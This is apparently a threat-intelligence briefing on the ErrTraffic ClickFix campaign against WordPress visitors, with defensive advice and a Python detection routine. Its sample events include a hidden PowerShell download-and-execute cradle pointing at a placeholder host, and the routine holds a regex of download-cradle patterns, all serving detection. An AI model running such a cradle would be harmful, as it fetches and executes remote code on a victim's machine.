
ErrTraffic malware campaign uses ClickFix lures on compromised WordPress sites

malware | open | Jun 16, 2026 — Jun 22, 2026

A newly observed malware campaign named ErrTraffic is using ClickFix lures on compromised WordPress sites to trick visitors into executing harmful PowerShell commands, according to analysis from Sekoia research. The activity was first detected in mid-June 2026 and has been linked to the threat actors LenAI and Rapid Brigantine.

Attackers inject malicious JavaScript into the compromised pages, which presents a fake CAPTCHA prompt to the visitor, as detailed in a write-up by SecurityOnline. When the user follows the instruction, a PowerShell command is executed that downloads a payload from an attacker-controlled server. The command and control channel leverages EtherHiding, storing encrypted cues in smart contracts on the Polygon blockchain to evade traditional detection.

The payload employs DLL sideloading techniques to load an encrypted malicious module into legitimate processes, a tactic highlighted in BlueVoyant’s analysis of the campaign. ErrTraffic is offered as a Malware‑as‑a‑Service, with LenAI handling subscriptions and periodically raising the price for access. Subscribers receive updates that refine the infection chain and add new obfuscation layers.

The campaign appears to be an evolution of the earlier Lorem Ipsum malware, which previously relied on Trojanised Microsoft Teams installers, as reported by DarkReading. After Microsoft disrupted a malware-signing service, the operators shifted to ClickFix lures on WordPress to broaden their reach. BlueVoyant analysts associate this shift with the Rapid Brigantine group, known for ties to several ransomware families. By using compromised websites, the threat actors can infect anyone who browses the site, not just users of a specific software.

Defenders should enable detailed PowerShell logging and monitor for suspicious script execution originating from browsers. Regularly auditing WordPress plugins, themes and core files for unauthorised JavaScript helps identify the injection point early. Enforcing strong, unique authentication for admin accounts reduces the likelihood of initial compromise. Additionally, watching for outbound connections to Polygon contract addresses can reveal the EtherHiding C2 mechanism.
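One way to act on the logging advice above, as an added example that is not from the Sekoia or BlueVoyant write-ups: a small triage routine over process-creation records that flags PowerShell launched from a browser or the Run dialog (explorer.exe) together with a download-cradle or hidden-window argument, the shape a ClickFix lure produces. The event records, field names and URL are constructed for the example.

```python
import re
from dataclasses import dataclass

# Parent processes a pasted ClickFix command typically runs under: the browser
# itself, or explorer.exe when the victim pastes into the Win+R "Run" dialog.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
LURE_PARENTS = BROWSERS | {"explorer.exe"}

# Command-line fragments common to download cradles and hidden execution.
CRADLE = re.compile(
    r"(\biwr\b|invoke-webrequest|\birm\b|invoke-restmethod|downloadstring|"
    r"frombase64string|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (e.g. Security 4688 / Sysmon 1)."""
    parent: str    # parent image name
    image: str     # child image name
    cmdline: str   # full child command line


def is_clickfix_like(ev: ProcessEvent) -> bool:
    """True when PowerShell starts from a lure parent with cradle-style arguments."""
    if ev.image.lower() not in {"powershell.exe", "pwsh.exe"}:
        return False
    return ev.parent.lower() in LURE_PARENTS and bool(CRADLE.search(ev.cmdline))


def triage(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """Return only the events worth an analyst's attention."""
    return [ev for ev in events if is_clickfix_like(ev)]


# Constructed sample events: two lure-shaped launches, three benign ones.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iwr http://example.invalid/p | iex"'),
    ProcessEvent("msedge.exe", "powershell.exe",
                 "powershell -NoProfile -EncodedCommand SQBFAFgAIAAoAA=="),
    ProcessEvent("cmd.exe", "powershell.exe", r"powershell -File C:\scripts\backup.ps1"),
    ProcessEvent("explorer.exe", "powershell.exe", "powershell Get-Process"),
    ProcessEvent("chrome.exe", "notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"ALERT parent={hit.parent} cmd={hit.cmdline}")
```

Pair this with script block logging (Event ID 4104) so the decoded script body is available once a launch is flagged.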

Keeping WordPress installations up to date and deploying a web application firewall can block many injection attempts. Educating users to recognise that legitimate CAPTCHA widgets never ask them to run PowerShell commands reduces the success rate of social engineering lures. Network segmentation limits lateral movement if a workstation becomes infected.

Intelligence briefing updated Jun 23, 2026

Threat actors: LenAI, Rapid Brigantine
Root source: blog.sekoia.io